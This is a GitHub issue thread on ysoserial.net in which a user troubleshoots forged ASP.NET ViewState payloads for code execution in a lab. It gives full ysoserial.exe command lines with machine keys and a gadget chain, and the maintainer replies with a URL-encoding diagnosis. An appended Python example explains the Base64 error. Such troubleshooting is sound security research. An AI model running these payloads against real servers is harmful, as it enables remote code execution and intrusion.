pwntester / ysoserial.net

Deserialization payload generator for a variety of .NET formatters

Constantly encountering FormatException: Invalid length for a Base-64 char array or string.

deathalliance opened this issue

Hello,

I'm trying the code execution vulnerability in a lab environment where the validation key and decryption keys are known. Unfortunately, I cannot get it to work no matter what I try.
I'm using .NET 4.0.

I've tried both by setting the ViewStateGenerator and through setting the app path (and I confirm that the ViewStateGenerator value is correct). I have also tried appending ='s at the end of the generated code. I've also tried URL encoding the generated viewstate that I send through the POST request.

Nothing works. I can't even get a single echo 123 > c:\windows\temp\test.txt working. What am I doing wrong?
(I know it should throw a 500 exception, but it should also create test.txt which it doesn't)

Here are some of the commands I have tried:

ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "echo 123 > c:\windows\temp\test.txt" --apppath="/p" --path="/p/default.aspx" --islegacy --validationalg="SHA1" --validationkey="1CAD8CD7D5084010C7AC86E09C048DF2E6351D8E1458173BD2F60C948FDCFC79474E7C4BFB8053B3D599D564C3F8F16CD36D4BFF85DC2B86964E110CAB5529B5" --isdebug

Also tried with giving both keys:

ysoserial.exe -p ViewState  -g TextFormattingRunProperties -c "echo 123 > c:\windows\temp\test.txt" --path="/p/default.aspx" --apppath="/p" --decryptionalg="Auto" --decryptionkey="9419E035D0FF7D8038D0DA7A21AFB4482C82E939147FB1C1B1F7EBCDDC69B617" --validationalg="SHA1" --validationkey="1CAD8CD7D5084010C7AC86E09C048DF2E6351D8E1458173BD2F60C948FDCFC79474E7C4BFB8053B3D599D564C3F8F16CD36D4BFF85DC2B86964E110CAB5529B5"

The generator code for the above path is 333BF894

Thanks!

I am guessing here but I think it can be because of lack of URL-encoding and the fact that it converts the + character to space if it has not been encoded.

I will close it for now, but feel free to comment to re-open it if it has nothing to do with URL-encoding. I will also try to add URL-encoding to the output by default in the next version.
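
The encoding problem the reply describes, as an added example that is not part of the original thread or of ysoserial.net: a Base64 value placed in a form-encoded POST body without percent-encoding has each `+` decoded to a space. `Convert.FromBase64String` is documented to skip whitespace, so the remaining characters are either no longer a multiple of four (the error in the issue title) or decode to different bytes. The function names and sample bytes are constructed for illustration, and `dotnet_style_decode` is a Python model of that documented behaviour, not .NET code.

```python
import base64
from urllib.parse import parse_qs, urlencode

FIELD = "__VIEWSTATE"      # ASP.NET hidden form field carrying the Base64 value
WHITESPACE = " \t\r\n"     # characters Convert.FromBase64String skips


def form_roundtrip(value, percent_encode):
    """Return the field value the server sees after form decoding."""
    if percent_encode:
        body = urlencode({FIELD: value})   # '+' -> %2B, '/' -> %2F, '=' -> %3D
    else:
        body = FIELD + "=" + value         # raw Base64 pasted into the body
    return parse_qs(body, keep_blank_values=True)[FIELD][0]


def dotnet_style_decode(text):
    """Model of the .NET rule: drop whitespace, then require length % 4 == 0."""
    stripped = "".join(ch for ch in text if ch not in WHITESPACE)
    if len(stripped) % 4 != 0:
        raise ValueError("Invalid length for a Base-64 char array or string.")
    return base64.b64decode(stripped, validate=True)


# Constructed sample bytes whose Base64 form contains exactly one '+'.
SAMPLE = b"\xf8\x00\x00hello"
SAMPLE_B64 = base64.b64encode(SAMPLE).decode()     # "+AAAaGVsbG8="

if __name__ == "__main__":
    for encode in (False, True):
        seen = form_roundtrip(SAMPLE_B64, encode)
        try:
            result = dotnet_style_decode(seen)
        except ValueError as err:
            result = "error: %s" % err
        print("percent_encode=%s server sees %r -> %r" % (encode, seen, result))
    # Four '+' characters keep the length valid, so the value is silently
    # truncated instead of rejected.
    print(dotnet_style_decode(form_roundtrip("++++AQ==", False)))
```
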